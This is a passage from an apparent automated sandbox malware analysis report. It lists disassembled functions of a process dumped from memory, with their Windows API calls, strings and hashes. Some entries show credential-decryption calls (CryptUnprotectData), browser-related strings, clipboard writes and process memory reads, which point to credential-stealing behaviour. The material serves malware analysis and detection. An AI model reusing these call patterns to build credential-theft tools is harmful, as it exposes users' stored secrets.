                          • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: EnumNamesResource
                          • String ID:
                          • API String ID: 3334572018-0
                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                          Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                          Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                          Download Yara Rule
                          APIs
                          • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                          Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                          Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                          Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                          • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                          Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004095FC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                            • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                          • String ID:
                          • API String ID: 3655998216-0
                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                          Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00445426
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                            • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                          • String ID:
                          • API String ID: 1828521557-0
                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                          Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??2@FilePointermemcpy
                          • String ID:
                          • API String ID: 609303285-0
                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                          Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _wcsicmp
                          • String ID:
                          • API String ID: 2081463915-0
                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                          Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$CloseCreateErrorHandleLastRead
                          • String ID:
                          • API String ID: 2136311172-0
                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                          Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??2@??3@
                          • String ID:
                          • API String ID: 1936579350-0
                          • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                          • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                          Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                          • Opcode Fuzzy Hash: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                          Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                          • Opcode Fuzzy Hash: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18

                          Non-executed Functions

                          Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • EmptyClipboard.USER32 ref: 004098EC
                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                          • GlobalLock.KERNEL32(00000000), ref: 00409927
                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                          • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                          • GetLastError.KERNEL32 ref: 0040995D
                          • CloseHandle.KERNEL32(?), ref: 00409969
                          • GetLastError.KERNEL32 ref: 00409974
                          • CloseClipboard.USER32 ref: 0040997D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                          • String ID:
                          • API String ID: 3604893535-0
                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                          Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • EmptyClipboard.USER32 ref: 00409882
                          • wcslen.MSVCRT ref: 0040988F
                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                          • GlobalLock.KERNEL32(00000000), ref: 004098AC
                          • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                          • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                          • CloseClipboard.USER32 ref: 004098D7
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                          • String ID:
                          • API String ID: 1213725291-0
                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                          Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32 ref: 004182D7
                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                          • LocalFree.KERNEL32(?), ref: 00418342
                          • free.MSVCRT ref: 00418370
                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                          • String ID: OsError 0x%x (%u)
                          • API String ID: 2360000266-2664311388
                          • Opcode ID: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                          • Opcode Fuzzy Hash: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                          Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 004173BE
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Version
                          • String ID:
                          • API String ID: 1889659487-0
                          • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                          • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                          • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                          • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                          Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                          Download Yara Rule
                          APIs
                          • _wcsicmp.MSVCRT ref: 004022A6
                          • _wcsicmp.MSVCRT ref: 004022D7
                          • _wcsicmp.MSVCRT ref: 00402305
                          • _wcsicmp.MSVCRT ref: 00402333
                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                          • memset.MSVCRT ref: 0040265F
                          • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                          • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                          • API String ID: 2257402768-1134094380
                          • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                          • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                          Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                          • String ID: :stringdata$ftp://$http://$https://
                          • API String ID: 2787044678-1921111777
                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                          Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                          • GetWindowRect.USER32(?,?), ref: 00414088
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                          • GetDC.USER32 ref: 004140E3
                          • wcslen.MSVCRT ref: 00414123
                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                          • ReleaseDC.USER32(?,?), ref: 00414181
                          • _snwprintf.MSVCRT ref: 00414244
                          • SetWindowTextW.USER32(?,?), ref: 00414258
                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                          • GetClientRect.USER32(?,?), ref: 004142E1
                          • GetWindowRect.USER32(?,?), ref: 004142EB
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                          • GetClientRect.USER32(?,?), ref: 0041433B
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                          • String ID: %s:$EDIT$STATIC
                          • API String ID: 2080319088-3046471546
                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                          Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                          Download Yara Rule
                          APIs
                          • EndDialog.USER32(?,?), ref: 00413221
                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                          • memset.MSVCRT ref: 00413292
                          • memset.MSVCRT ref: 004132B4
                          • memset.MSVCRT ref: 004132CD
                          • memset.MSVCRT ref: 004132E1
                          • memset.MSVCRT ref: 004132FB
                          • memset.MSVCRT ref: 00413310
                          • GetCurrentProcess.KERNEL32 ref: 00413318
                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                          • memset.MSVCRT ref: 004133C0
                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                          • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                          • wcscpy.MSVCRT ref: 0041341F
                          • _snwprintf.MSVCRT ref: 0041348E
                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                          • SetFocus.USER32(00000000), ref: 004134B7
                          Strings
